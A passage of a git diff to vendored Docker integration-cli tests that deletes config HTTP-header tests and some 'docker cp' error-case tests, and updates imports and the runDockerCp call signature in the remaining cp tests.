+	id := strings.TrimSpace(out)
+	config := d.GetConfig(c, id)
+	c.Assert(config.Spec.Name, checker.Equals, testName)
+}
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_config_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_config_test.go
deleted file mode 100644
index 1d5e5ad3db..0000000000
--- a/vendor/github.com/docker/docker/integration-cli/docker_cli_config_test.go
+++ /dev/null
@@ -1,140 +0,0 @@
-package main
-
-import (
-	"io/ioutil"
-	"net/http"
-	"net/http/httptest"
-	"os"
-	"os/exec"
-	"path/filepath"
-	"runtime"
-
-	"github.com/docker/docker/api"
-	"github.com/docker/docker/dockerversion"
-	"github.com/docker/docker/pkg/homedir"
-	"github.com/docker/docker/pkg/integration/checker"
-	"github.com/go-check/check"
-)
-
-func (s *DockerSuite) TestConfigHTTPHeader(c *check.C) {
-	testRequires(c, UnixCli) // Can't set/unset HOME on windows right now
-	// We either need a level of Go that supports Unsetenv (for cases
-	// when HOME/USERPROFILE isn't set), or we need to be able to use
-	// os/user but user.Current() only works if we aren't statically compiling
-
-	var headers map[string][]string
-
-	server := httptest.NewServer(http.HandlerFunc(
-		func(w http.ResponseWriter, r *http.Request) {
-			w.Header().Set("API-Version", api.DefaultVersion)
-			headers = r.Header
-		}))
-	defer server.Close()
-
-	homeKey := homedir.Key()
-	homeVal := homedir.Get()
-	tmpDir, err := ioutil.TempDir("", "fake-home")
-	c.Assert(err, checker.IsNil)
-	defer os.RemoveAll(tmpDir)
-
-	dotDocker := filepath.Join(tmpDir, ".docker")
-	os.Mkdir(dotDocker, 0600)
-	tmpCfg := filepath.Join(dotDocker, "config.json")
-
-	defer func() { os.Setenv(homeKey, homeVal) }()
-	os.Setenv(homeKey, tmpDir)
-
-	data := `{
-		"HttpHeaders": { "MyHeader": "MyValue" }
-	}`
-
-	err = ioutil.WriteFile(tmpCfg, []byte(data), 0600)
-	c.Assert(err, checker.IsNil)
-
-	cmd := exec.Command(dockerBinary, "-H="+server.URL[7:], "ps")
-	out, _, _ := runCommandWithOutput(cmd)
-
-	c.Assert(headers["User-Agent"], checker.NotNil, check.Commentf("Missing User-Agent"))
-
-	c.Assert(headers["User-Agent"][0], checker.Equals, "Docker-Client/"+dockerversion.Version+" ("+runtime.GOOS+")", check.Commentf("Badly formatted User-Agent,out:%v", out))
-
-	c.Assert(headers["Myheader"], checker.NotNil)
-	c.Assert(headers["Myheader"][0], checker.Equals, "MyValue", check.Commentf("Missing/bad header,out:%v", out))
-
-}
-
-func (s *DockerSuite) TestConfigDir(c *check.C) {
-	cDir, err := ioutil.TempDir("", "fake-home")
-	c.Assert(err, checker.IsNil)
-	defer os.RemoveAll(cDir)
-
-	// First make sure pointing to empty dir doesn't generate an error
-	dockerCmd(c, "--config", cDir, "ps")
-
-	// Test with env var too
-	cmd := exec.Command(dockerBinary, "ps")
-	cmd.Env = appendBaseEnv(true, "DOCKER_CONFIG="+cDir)
-	out, _, err := runCommandWithOutput(cmd)
-
-	c.Assert(err, checker.IsNil, check.Commentf("ps2 didn't work,out:%v", out))
-
-	// Start a server so we can check to see if the config file was
-	// loaded properly
-	var headers map[string][]string
-
-	server := httptest.NewServer(http.HandlerFunc(
-		func(w http.ResponseWriter, r *http.Request) {
-			headers = r.Header
-		}))
-	defer server.Close()
-
-	// Create a dummy config file in our new config dir
-	data := `{
-		"HttpHeaders": { "MyHeader": "MyValue" }
-	}`
-
-	tmpCfg := filepath.Join(cDir, "config.json")
-	err = ioutil.WriteFile(tmpCfg, []byte(data), 0600)
-	c.Assert(err, checker.IsNil, check.Commentf("Err creating file"))
-
-	env := appendBaseEnv(false)
-
-	cmd = exec.Command(dockerBinary, "--config", cDir, "-H="+server.URL[7:], "ps")
-	cmd.Env = env
-	out, _, err = runCommandWithOutput(cmd)
-
-	c.Assert(err, checker.NotNil, check.Commentf("out:%v", out))
-	c.Assert(headers["Myheader"], checker.NotNil)
-	c.Assert(headers["Myheader"][0], checker.Equals, "MyValue", check.Commentf("ps3 - Missing header,out:%v", out))
-
-	// Reset headers and try again using env var this time
-	headers = map[string][]string{}
-	cmd = exec.Command(dockerBinary, "-H="+server.URL[7:], "ps")
-	cmd.Env = append(env, "DOCKER_CONFIG="+cDir)
-	out, _, err = runCommandWithOutput(cmd)
-
-	c.Assert(err, checker.NotNil, check.Commentf("%v", out))
-	c.Assert(headers["Myheader"], checker.NotNil)
-	c.Assert(headers["Myheader"][0], checker.Equals, "MyValue", check.Commentf("ps4 - Missing header,out:%v", out))
-
-	// Reset headers and make sure flag overrides the env var
-	headers = map[string][]string{}
-	cmd = exec.Command(dockerBinary, "--config", cDir, "-H="+server.URL[7:], "ps")
-	cmd.Env = append(env, "DOCKER_CONFIG=MissingDir")
-	out, _, err = runCommandWithOutput(cmd)
-
-	c.Assert(err, checker.NotNil, check.Commentf("out:%v", out))
-	c.Assert(headers["Myheader"], checker.NotNil)
-	c.Assert(headers["Myheader"][0], checker.Equals, "MyValue", check.Commentf("ps5 - Missing header,out:%v", out))
-
-	// Reset headers and make sure flag overrides the env var.
-	// Almost same as previous but make sure the "MissingDir" isn't
-	// ignore - we don't want to default back to the env var.
-	headers = map[string][]string{}
-	cmd = exec.Command(dockerBinary, "--config", "MissingDir", "-H="+server.URL[7:], "ps")
-	cmd.Env = append(env, "DOCKER_CONFIG="+cDir)
-	out, _, err = runCommandWithOutput(cmd)
-
-	c.Assert(err, checker.NotNil, check.Commentf("out:%v", out))
-	c.Assert(headers["Myheader"], checker.IsNil, check.Commentf("ps6 - Headers shouldn't be the expected value,out:%v", out))
-}
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_cp_from_container_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_cp_from_container_test.go
index 9ed7e8c720..499be54522 100644
--- a/vendor/github.com/docker/docker/integration-cli/docker_cli_cp_from_container_test.go
+++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_cp_from_container_test.go
@@ -4,12 +4,10 @@ import (
 	"os"
 	"path/filepath"
 
-	"github.com/docker/docker/pkg/integration/checker"
+	"github.com/docker/docker/integration-cli/checker"
 	"github.com/go-check/check"
 )
 
-// docker cp CONTAINER:PATH LOCALPATH
-
 // Try all of the test cases from the archive package which implements the
 // internals of `docker cp` and ensure that the behavior matches when actually
 // copying to and from containers.
@@ -20,96 +18,9 @@ import (
 // 3. DST parent directory must exist.
 // 4. If DST exists as a file, it must not end with a trailing separator.
 
-// First get these easy error cases out of the way.
-
-// Test for error when SRC does not exist.
-func (s *DockerSuite) TestCpFromErrSrcNotExists(c *check.C) {
-	containerID := makeTestContainer(c, testContainerOptions{})
-
-	tmpDir := getTestDir(c, "test-cp-from-err-src-not-exists")
-	defer os.RemoveAll(tmpDir)
-
-	err := runDockerCp(c, containerCpPath(containerID, "file1"), tmpDir)
-	c.Assert(err, checker.NotNil)
-
-	c.Assert(isCpNotExist(err), checker.True, check.Commentf("expected IsNotExist error, but got %T: %s", err, err))
-}
-
-// Test for error when SRC ends in a trailing
-// path separator but it exists as a file.
-func (s *DockerSuite) TestCpFromErrSrcNotDir(c *check.C) {
-	testRequires(c, DaemonIsLinux)
-	containerID := makeTestContainer(c, testContainerOptions{addContent: true})
-
-	tmpDir := getTestDir(c, "test-cp-from-err-src-not-dir")
-	defer os.RemoveAll(tmpDir)
-
-	err := runDockerCp(c, containerCpPathTrailingSep(containerID, "file1"), tmpDir)
-	c.Assert(err, checker.NotNil)
-
-	c.Assert(isCpNotDir(err), checker.True, check.Commentf("expected IsNotDir error, but got %T: %s", err, err))
-}
-
-// Test for error when SRC is a valid file or directory,
-// bu the DST parent directory does not exist.
-func (s *DockerSuite) TestCpFromErrDstParentNotExists(c *check.C) {
-	testRequires(c, DaemonIsLinux)
-	containerID := makeTestContainer(c, testContainerOptions{addContent: true})
-
-	tmpDir := getTestDir(c, "test-cp-from-err-dst-parent-not-exists")
-	defer os.RemoveAll(tmpDir)
-
-	makeTestContentInDir(c, tmpDir)
-
-	// Try with a file source.
-	srcPath := containerCpPath(containerID, "/file1")
-	dstPath := cpPath(tmpDir, "notExists", "file1")
-
-	err := runDockerCp(c, srcPath, dstPath)
-	c.Assert(err, checker.NotNil)
-
-	c.Assert(isCpNotExist(err), checker.True, check.Commentf("expected IsNotExist error, but got %T: %s", err, err))
-
-	// Try with a directory source.
-	srcPath = containerCpPath(containerID, "/dir1")
-
-	err = runDockerCp(c, srcPath, dstPath)
-	c.Assert(err, checker.NotNil)
-
-	c.Assert(isCpNotExist(err), checker.True, check.Commentf("expected IsNotExist error, but got %T: %s", err, err))
-}
-
-// Test for error when DST ends in a trailing
-// path separator but exists as a file.
-func (s *DockerSuite) TestCpFromErrDstNotDir(c *check.C) {
-	testRequires(c, DaemonIsLinux)
-	containerID := makeTestContainer(c, testContainerOptions{addContent: true})
-
-	tmpDir := getTestDir(c, "test-cp-from-err-dst-not-dir")
-	defer os.RemoveAll(tmpDir)
-
-	makeTestContentInDir(c, tmpDir)
-
-	// Try with a file source.
-	srcPath := containerCpPath(containerID, "/file1")
-	dstPath := cpPathTrailingSep(tmpDir, "file1")
-
-	err := runDockerCp(c, srcPath, dstPath)
-	c.Assert(err, checker.NotNil)
-
-	c.Assert(isCpNotDir(err), checker.True, check.Commentf("expected IsNotDir error, but got %T: %s", err, err))
-
-	// Try with a directory source.
-	srcPath = containerCpPath(containerID, "/dir1")
-
-	err = runDockerCp(c, srcPath, dstPath)
-	c.Assert(err, checker.NotNil)
-
-	c.Assert(isCpNotDir(err), checker.True, check.Commentf("expected IsNotDir error, but got %T: %s", err, err))
-}
-
 // Check that copying from a container to a local symlink copies to the symlink
 // target and does not overwrite the local symlink itself.
+// TODO: move to docker/cli and/or integration/container/copy_test.go
 func (s *DockerSuite) TestCpFromSymlinkDestination(c *check.C) {
 	testRequires(c, DaemonIsLinux)
 	containerID := makeTestContainer(c, testContainerOptions{addContent: true})
@@ -124,7 +35,7 @@ func (s *DockerSuite) TestCpFromSymlinkDestination(c *check.C) {
 	srcPath := containerCpPath(containerID, "/file2")
 	dstPath := cpPath(tmpDir, "symlinkToFile1")
 
-	c.Assert(runDockerCp(c, srcPath, dstPath), checker.IsNil)
+	c.Assert(runDockerCp(c, srcPath, dstPath, nil), checker.IsNil)
 
 	// The symlink should not have been modified.
 	c.Assert(symlinkTargetEquals(c, dstPath, "file1"), checker.IsNil)
@@ -136,7 +47,7 @@ func (s *DockerSuite) TestCpFromSymlinkDestination(c *check.C) {
 	// should copy the file into the symlink target directory.
 	dstPath = cpPath(tmpDir, "symlinkToDir1")
 
-	c.Assert(runDockerCp(c, srcPath, dstPath), checker.IsNil)
+	c.Assert(runDockerCp(c, srcPath, dstPath, nil), checker.IsNil)
 
 	// The symlink should not have been modified.
 	c.Assert(symlinkTargetEquals(c, dstPath, "dir1"), checker.IsNil)
@@ -149,7 +60,7 @@ func (s *DockerSuite) TestCpFromSymlinkDestination(c *check.C) {
 	// the contents of the source file.
 	dstPath = cpPath(tmpDir, "brokenSymlinkToFileX")
 
-	c.Assert(runDockerCp(c, srcPath, dstPath), checker.IsNil)
+	c.Assert(runDockerCp(c, srcPath, dstPath, nil), checker.IsNil)
 
 	// The symlink should not have been modified.
 	c.Assert(symlinkTargetEquals(c, dstPath, "fileX"), checker.IsNil)
@@ -163,7 +74,7 @@ func (s *DockerSuite) TestCpFromSymlinkDestination(c *check.C) {
 	srcPath = containerCpPath(containerID, "/dir2")
 	dstPath = cpPath(tmpDir, "symlinkToDir1")
 
-	c.Assert(runDockerCp(c, srcPath, dstPath), checker.IsNil)
+	c.Assert(runDockerCp(c, srcPath, dstPath, nil), checker.IsNil)
 
 	// The symlink should not have been modified.
 	c.Assert(symlinkTargetEquals(c, dstPath, "dir1"), checker.IsNil)
@@ -177,7 +88,7 @@ func (s *DockerSuite) TestCpFromSymlinkDestination(c *check.C) {
 	// should not modify the symlink.
 	dstPath = cpPath(tmpDir, "brokenSymlinkToDirX")
 
-	c.Assert(runDockerCp(c, srcPath, dstPath), checker.IsNil)
+	c.Assert(runDockerCp(c, srcPath, dstPath, nil), checker.IsNil)
 
 	// The symlink should not have been modified.
 	c.Assert(symlinkTargetEquals(c, dstPath, "dirX"), checker.IsNil)
@@ -217,7 +128,7 @@ func (s *DockerSuite) TestCpFromCaseA(c *check.C) {
 	srcPath := containerCpPath(containerID, "/root/file1")
 	dstPath := cpPath(tmpDir, "itWorks.txt")
 
-	c.Assert(runDockerCp(c, srcPath, dstPath), checker.IsNil)
+	c.Assert(runDockerCp(c, srcPath, dstPath, nil), checker.IsNil)
 
 	c.Assert(fileContentEquals(c, dstPath, "file1\n"), checker.IsNil)
 }
@@ -235,7 +146,7 @@ func (s *DockerSuite) TestCpFromCaseB(c *check.C) {
 	srcPath := containerCpPath(containerID, "/file1")
 	dstDir := cpPathTrailingSep(tmpDir, "testDir")
 
-	err := runDockerCp(c, srcPath, dstDir)
+	err := runDockerCp(c, srcPath, dstDir, nil)
 	c.Assert(err, checker.NotNil)
 
 	c.Assert(isCpDirNotExist(err), checker.True, check.Commentf("expected DirNotExists error, but got %T: %s", err, err))
@@ -260,7 +171,7 @@ func (s *DockerSuite) TestCpFromCaseC(c *check.C) {
 	// Ensure the local file starts with different content.
 	c.Assert(fileContentEquals(c, dstPath, "file2\n"), checker.IsNil)
 
-	c.Assert(runDockerCp(c, srcPath, dstPath), checker.IsNil)
+	c.Assert(runDockerCp(c, srcPath, dstPath, nil), checker.IsNil)
 
 	c.Assert(fileContentEquals(c, dstPath, "file1\n"), checker.IsNil)
 }
@@ -285,7 +196,7 @@ func (s *DockerSuite) TestCpFromCaseD(c *check.C) {
 	_, err := os.Stat(dstPath)
 	c.Assert(os.IsNotExist(err), checker.True, check.Commentf("did not expect dstPath %q to exist", dstPath))
 
-	c.Assert(runDockerCp(c, srcPath, dstDir), checker.IsNil)
+	c.Assert(runDockerCp(c, srcPath, dstDir, nil), checker.IsNil)
 
 	c.Assert(fileContentEquals(c, dstPath, "file1\n"), checker.IsNil)
 
@@ -299,7 +210,7 @@ func (s *DockerSuite) TestCpFromCaseD(c *check.C) {
 
 	dstDir = cpPathTrailingSep(tmpDir, "dir1")
 
-	c.Assert(runDockerCp(c, srcPath, dstDir), checker.IsNil)
+	c.Assert(runDockerCp(c, srcPath, dstDir, nil), checker.IsNil)
 
 	c.Assert(fileContentEquals(c, dstPath, "file1\n"), checker.IsNil)
 }
@@ -319,7 +230,7 @@ func (s *DockerSuite) TestCpFromCaseE(c *check.C) {
 	dstDir := cpPath(tmpDir, "testDir")
 	dstPath := filepath.Join(dstDir, "file1-1")
 
-	c.Assert(runDockerCp(c, srcDir, dstDir), checker.IsNil)
+	c.Assert(runDockerCp(c, srcDir, dstDir, nil), checker.IsNil)
 
 	c.Assert(fileContentEquals(c, dstPath, "file1-1\n"), checker.IsNil)
 
@@ -330,7 +241,7 @@ func (s *DockerSuite) TestCpFromCaseE(c *check.C) {
 
 	dstDir = cpPathTrailingSep(tmpDir, "testDir")
 
-	c.Assert(runDockerCp(c, srcDir, dstDir), checker.IsNil)
+	c.Assert(runDockerCp(c, srcDir, dstDir, nil), checker.IsNil)
 
 	c.Assert(fileContentEquals(c, dstPath, "file1-1\n"), checker.IsNil)
 }
@@ -351,7 +262,7 @@ func (s *DockerSuite) TestCpFromCaseF(c *check.C) {
 	srcDir := containerCpPath(containerID, "/root/dir1")
 	dstFile := cpPath(tmpDir, "file1")
 
-	err := runDockerCp(c, srcDir, dstFile)
+	err := runDockerCp(c, srcDir, dstFile, nil)
 	c.Assert(err, checker.NotNil)
 
 	c.Assert(isCpCannotCopyDir(err), checker.True, check.Commentf("expected ErrCannotCopyDir error, but got %T: %s", err, err))
@@ -376,7 +287,7 @@ func (s *DockerSuite) TestCpFromCaseG(c *check.C) {
 	resultDir := filepath.Join(dstDir, "dir1")
 	dstPath := filepath.Join(resultDir, "file1-1")
 
-	c.Assert(runDockerCp(c, srcDir, dstDir), checker.IsNil)
+	c.Assert(runDockerCp(c, srcDir, dstDir, nil), checker.IsNil)
 
 	c.Assert(fileContentEquals(c, dstPath, "file1-1\n"), checker.IsNil)
 
@@ -390,7 +301,7 @@ func (s *DockerSuite) TestCpFromCaseG(c *check.C) {
 
 	dstDir = cpPathTrailingSep(tmpDir, "dir2")
 
-	c.Assert(runDockerCp(c, srcDir, dstDir), checker.IsNil)
+	c.Assert(runDockerCp(c, srcDir, dstDir, nil), checker.IsNil)
 
 	c.Assert(fileContentEquals(c, dstPath, "file1-1\n"), checker.IsNil)
 }
@@ -410,7 +321,7 @@ func (s *DockerSuite) TestCpFromCaseH(c *check.C) {
 	dstDir := cpPath(tmpDir, "testDir")
 	dstPath := filepath.Join(dstDir, "file1-1")
 
-	c.Assert(runDockerCp(c, srcDir, dstDir), checker.IsNil)
+	c.Assert(runDockerCp(c, srcDir, dstDir, nil), checker.IsNil)
 
 	c.Assert(fileContentEquals(c, dstPath, "file1-1\n"), checker.IsNil)
 
@@ -421,7 +332,7 @@ func (s *DockerSuite) TestCpFromCaseH(c *check.C) {
 
 	dstDir = cpPathTrailingSep(tmpDir, "testDir")
 
-	c.Assert(runDockerCp(c, srcDir, dstDir), checker.IsNil)
+	c.Assert(runDockerCp(c, srcDir, dstDir, nil), checker.IsNil)
 
 	c.Assert(fileContentEquals(c, dstPath, "file1-1\n"), checker.IsNil)
 }
@@ -443,7 +354,7 @@ func (s *DockerSuite) TestCpFromCaseI(c *check.C) {
 	srcDir := containerCpPathTrailingSep(containerID, "/root/dir1") + "."
 	dstFile := cpPath(tmpDir, "file1")
 
-	err := runDockerCp(c, srcDir, dstFile)
+	err := runDockerCp(c, srcDir, dstFile, nil)
 	c.Assert(err, checker.NotNil)
 
 	c.Assert(isCpCannotCopyDir(err), checker.True, check.Commentf("expected ErrCannotCopyDir error, but got %T: %s", err, err))
@@ -468,7 +379,7 @@ func (s *DockerSuite) TestCpFromCaseJ(c *check.C) {
 	dstDir := cpPath(tmpDir, "dir2")
 	dstPath := filepath.Join(dstDir, "file1-1")
 
-	c.Assert(runDockerCp(c, srcDir, dstDir), checker.IsNil)
+	c.Assert(runDockerCp(c, srcDir, dstDir, nil), checker.IsNil)
 
 	c.Assert(fileContentEquals(c, dstPath, "file1-1\n"), checker.IsNil)
 
@@ -482,7 +393,7 @@ func (s *DockerSuite) TestCpFromCaseJ(c *check.C) {
 
 	dstDir = cpPathTrailingSep(tmpDir, "dir2")
 
-	c.Assert(runDockerCp(c, srcDir, dstDir), checker.IsNil)
+	c.Assert(runDockerCp(c, srcDir, dstDir, nil), checker.IsNil)
 
 	c.Assert(fileContentEquals(c, dstPath, "file1-1\n"), checker.IsNil)
 }
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_cp_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_cp_test.go
index 4e5c39e998..ec53712fab 100644
--- a/vendor/github.com/docker/docker/integration-cli/docker_cli_cp_test.go
+++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_cp_test.go
@@ -10,9 +10,9 @@ import (
 	"path/filepath"
 	"strings"
 
-	"github.com/docker/docker/pkg/integration/checker"
-	icmd "github.com/docker/docker/pkg/integration/cmd"
+	"github.com/docker/docker/integration-cli/checker"
 	"github.com/go-check/check"
+	"gotest.tools/icmd"
 )
 
 const (
@@ -27,7 +27,7 @@ const (
 
 // Ensure that an all-local path case returns an error.
 func (s *DockerSuite) TestCpLocalOnly(c *check.C) {
-	err := runDockerCp(c, "foo", "bar")
+	err := runDockerCp(c, "foo", "bar", nil)
 	c.Assert(err, checker.NotNil)
 
 	c.Assert(err.Error(), checker.Contains, "must specify at least one container source")
@@ -379,7 +379,7 @@ func (s *DockerSuite) TestCpSymlinkComponent(c *check.C) {
 
 // Check that cp with unprivileged user doesn't return any error
 func (s *DockerSuite) TestCpUnprivilegedUser(c *check.C) {
-	testRequires(c, DaemonIsLinux)
+	testRequires(c, DaemonIsLinux, SameHostDaemon)
 	testRequires(c, UnixCli) // uses chmod/su: not available on windows
 
 	out, _ := dockerCmd(c, "run", "-d", "busybox", "/bin/sh", "-c", "touch "+cpTestName)
@@ -421,7 +421,7 @@ func (s *DockerSuite) TestCpSpecialFiles(c *check.C) {
 	// Copy actual /etc/resolv.conf
 	dockerCmd(c, "cp", containerID+":/etc/resolv.conf", outDir)
 
-	expected, err := readContainerFile(containerID, "resolv.conf")
+	expected := readContainerFile(c, containerID, "resolv.conf")
 	actual, err := ioutil.ReadFile(outDir + "/resolv.conf")
 
 	// Expected copied file to be duplicate of the container resolvconf
@@ -430,7 +430,7 @@ func (s *DockerSuite) TestCpSpecialFiles(c *check.C) {
 	// Copy actual /etc/hosts
 	dockerCmd(c, "cp", containerID+":/etc/hosts", outDir)
 
-	expected, err = readContainerFile(containerID, "hosts")
+	expected = readContainerFile(c, containerID, "hosts")
 	actual, err = ioutil.ReadFile(outDir + "/hosts")
 
 	// Expected copied file to be duplicate of the container hosts
@@ -439,8 +439,9 @@ func (s *DockerSuite) TestCpSpecialFiles(c *check.C) {
 	// Copy actual /etc/resolv.conf
 	dockerCmd(c, "cp", containerID+":/etc/hostname", outDir)
 
-	expected, err = readContainerFile(containerID, "hostname")
+	expected = readContainerFile(c, containerID, "hostname")
 	actual, err = ioutil.ReadFile(outDir + "/hostname")
+	c.Assert(err, checker.IsNil)
 
 	// Expected copied file to be duplicate of the container resolvconf
 	c.Assert(bytes.Equal(actual, expected), checker.True)
@@ -533,6 +534,7 @@ func (s *DockerSuite) TestCpToDot(c *check.C) {
 	c.Assert(os.Chdir(tmpdir), checker.IsNil)
 	dockerCmd(c, "cp", containerID+":/test", ".")
 	content, err := ioutil.ReadFile("./test")
+	c.Assert(err, checker.IsNil)
 	c.Assert(string(content), checker.Equals, "lololol\n")
 }
 
@@ -545,7 +547,7 @@ func (s *DockerSuite) TestCpToStdout(c *check.C) {
 	// failed to set up container
 	c.Assert(strings.TrimSpace(out), checker.Equals, "0")
 
-	out, _, err := runCommandPipelineWithOutput(
+	out, err := RunCommandPipelineWithOutput(
 		exec.Command(dockerBinary, "cp", containerID+":/test", "-"),
 		exec.Command("tar", "-vtf", "-"))
 
@@ -571,6 +573,7 @@ func (s *DockerSuite) TestCpNameHasColon(c *check.C) {
 	defer os.RemoveAll(tmpdir)
 	dockerCmd(c, "cp", containerID+":/te:s:t", tmpdir)
 	content, err := ioutil.ReadFile(tmpdir + "/te:s:t")
+	c.Assert(err, checker.IsNil)
 	c.Assert(string(content), checker.Equals, "lololol\n")
 }
 
@@ -652,6 +655,7 @@ func (s *DockerSuite) TestCpSymlinkFromConToHostFollowSymlink(c *check.C) {
 	dockerCmd(c, "cp", "-L", cleanedContainerID+":"+"/dir_link", expectedPath)
 
 	actual, err = ioutil.ReadFile(expectedPath)
+	c.Assert(err, checker.IsNil)
 
 	if !bytes.Equal(actual, expected) {
 		c.Fatalf("Expected copied file to be duplicate of the container symbol link target")
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_cp_to_container_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_cp_to_container_test.go
index f981cb8f8b..77567a3b95 100644
--- a/vendor/github.com/docker/docker/integration-cli/docker_cli_cp_to_container_test.go
+++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_cp_to_container_test.go
@@ -3,12 +3,10 @@ package main
 import (
 	"os"
 
-	"github.com/docker/docker/pkg/integration/checker"
+	"github.com/docker/docker/integration-cli/checker"
 	"github.com/go-check/check"
 )
 
-// docker cp LOCALPATH CONTAINER:PATH
-
 // Try all of the test cases from the archive package which implements the
 // internals of `docker cp` and ensure that the behavior matches when actually
 // copying to and from containers.
@@ -19,108 +17,6 @@ import (
 // 3. DST parent directory must exist.
 // 4. If DST exists as a file, it must not end with a trailing separator.
 
-// First get these easy error cases out of the way.
-
-// Test for error when SRC does not exist.
-func (s *DockerSuite) TestCpToErrSrcNotExists(c *check.C) {
-	containerID := makeTestContainer(c, testContainerOptions{})
-
-	tmpDir := getTestDir(c, "test-cp-to-err-src-not-exists")
-	defer os.RemoveAll(tmpDir)
-
-	srcPath := cpPath(tmpDir, "file1")
-	dstPath := containerCpPath(containerID, "file1")
-
-	err := runDockerCp(c, srcPath, dstPath)
-	c.Assert(err, checker.NotNil)
-
-	c.Assert(isCpNotExist(err), checker.True, check.Commentf("expected IsNotExist error, but got %T: %s", err, err))
-}
-
-// Test for error when SRC ends in a trailing
-// path separator but it exists as a file.
-func (s *DockerSuite) TestCpToErrSrcNotDir(c *check.C) {
-	containerID := makeTestContainer(c, testContainerOptions{})
-
-	tmpDir := getTestDir(c, "test-cp-to-err-src-not-dir")
-	defer os.RemoveAll(tmpDir)
-
-	makeTestContentInDir(c, tmpDir)
-
-	srcPath := cpPathTrailingSep(tmpDir, "file1")
-	dstPath := containerCpPath(containerID, "testDir")
-
-	err := runDockerCp(c, srcPath, dstPath)
-	c.Assert(err, checker.NotNil)
-
-	c.Assert(isCpNotDir(err), checker.True, check.Commentf("expected IsNotDir error, but got %T: %s", err, err))
-}
-
-// Test for error when SRC is a valid file or directory,
-// bu the DST parent directory does not exist.
-func (s *DockerSuite) TestCpToErrDstParentNotExists(c *check.C) {
-	testRequires(c, DaemonIsLinux)
-	containerID := makeTestContainer(c, testContainerOptions{addContent: true})
-
-	tmpDir := getTestDir(c, "test-cp-to-err-dst-parent-not-exists")
-	defer os.RemoveAll(tmpDir)
-
-	makeTestContentInDir(c, tmpDir)
-
-	// Try with a file source.
-	srcPath := cpPath(tmpDir, "file1")
-	dstPath := containerCpPath(containerID, "/notExists", "file1")
-
-	err := runDockerCp(c, srcPath, dstPath)
-	c.Assert(err, checker.NotNil)
-
-	c.Assert(isCpNotExist(err), checker.True, check.Commentf("expected IsNotExist error, but got %T: %s", err, err))
-
-	// Try with a directory source.
-	srcPath = cpPath(tmpDir, "dir1")
-
-	c.Assert(err, checker.NotNil)
-
-	c.Assert(isCpNotExist(err), checker.True, check.Commentf("expected IsNotExist error, but got %T: %s", err, err))
-}
-
-// Test for error when DST ends in a trailing path separator but exists as a
-// file. Also test that we cannot overwrite an existing directory with a
-// non-directory and cannot overwrite an existing
-func (s *DockerSuite) TestCpToErrDstNotDir(c *check.C) {
-	testRequires(c, DaemonIsLinux)
-	containerID := makeTestContainer(c, testContainerOptions{addContent: true})
-
-	tmpDir := getTestDir(c, "test-cp-to-err-dst-not-dir")
-	defer os.RemoveAll(tmpDir)
-
-	makeTestContentInDir(c, tmpDir)
-
-	// Try with a file source.
-	srcPath := cpPath(tmpDir, "dir1/file1-1")
-	dstPath := containerCpPathTrailingSep(containerID, "file1")
-
-	// The client should encounter an error trying to stat the destination
-	// and then be unable to copy since the destination is asserted to be a
-	// directory but does not exist.
-	err := runDockerCp(c, srcPath, dstPath)
-	c.Assert(err, checker.NotNil)
-
-	c.Assert(isCpDirNotExist(err), checker.True, check.Commentf("expected DirNotExist error, but got %T: %s", err, err))
-
-	// Try with a directory source.
-	srcPath = cpPath(tmpDir, "dir1")
-
-	// The client should encounter an error trying to stat the destination and
-	// then decide to extract to the parent directory instead with a rebased
-	// name in the source archive, but this directory would overwrite the
-	// existing file with the same name.
-	err = runDockerCp(c, srcPath, dstPath)
-	c.Assert(err, checker.NotNil)
-
-	c.Assert(isCannotOverwriteNonDirWithDir(err), checker.True, check.Commentf("expected CannotOverwriteNonDirWithDir error, but got %T: %s", err, err))
-}
-
 // Check that copying from a local path to a symlink in a container copies to
 // the symlink target and does not overwrite the container symlink itself.
 func (s *DockerSuite) TestCpToSymlinkDestination(c *check.C) {
@@ -143,7 +39,7 @@ func (s *DockerSuite) TestCpToSymlinkDestination(c *check.C) {
 	srcPath := cpPath(testVol, "file2")
 	dstPath := containerCpPath(containerID, "/vol2/symlinkToFile1")
 
-	c.Assert(runDockerCp(c, srcPath, dstPath), checker.IsNil)
+	c.Assert(runDockerCp(c, srcPath, dstPath, nil), checker.IsNil)
 
 	// The symlink should not have been modified.
 	c.Assert(symlinkTargetEquals(c, cpPath(testVol, "symlinkToFile1"), "file1"), checker.IsNil)
@@ -155,7 +51,7 @@ func (s *DockerSuite) TestCpToSymlinkDestination(c *check.C) {
 	// This should copy the file into the symlink target directory.
 	dstPath = containerCpPath(containerID, "/vol2/symlinkToDir1")
 
-	c.Assert(runDockerCp(c, srcPath, dstPath), checker.IsNil)
+	c.Assert(runDockerCp(c, srcPath, dstPath, nil), checker.IsNil)
 
 	// The symlink should not have been modified.
 	c.Assert(symlinkTargetEquals(c, cpPath(testVol, "symlinkToDir1"), "dir1"), checker.IsNil)
@@ -168,7 +64,7 @@ func (s *DockerSuite) TestCpToSymlinkDestination(c *check.C) {
 	// contents of the source file.
 	dstPath = containerCpPath(containerID, "/vol2/brokenSymlinkToFileX")
 
-	c.Assert(runDockerCp(c, srcPath, dstPath), checker.IsNil)
+	c.Assert(runDockerCp(c, srcPath, dstPath, nil), checker.IsNil)
 
 	// The symlink should not have been modified.
 	c.Assert(symlinkTargetEquals(c, cpPath(testVol, "brokenSymlinkToFileX"), "fileX"), checker.IsNil)
@@ -182,7 +78,7 @@ func (s *DockerSuite) TestCpToSymlinkDestination(c *check.C) {
 	srcPath = cpPath(testVol, "/dir2")
 	dstPath = containerCpPath(containerID, "/vol2/symlinkToDir1")
 
-	c.Assert(runDockerCp(c, srcPath, dstPath), checker.IsNil)
+	c.Assert(runDockerCp(c, srcPath, dstPath, nil), checker.IsNil)
 
 	// The symlink should not have been modified.
 	c.Assert(symlinkTargetEquals(c, cpPath(testVol, "symlinkToDir1"), "dir1"), checker.IsNil)
@@ -196,7 +92,7 @@ func (s *DockerSuite) TestCpToSymlinkDestination(c *check.C) {
 	// should not modify the symlink.
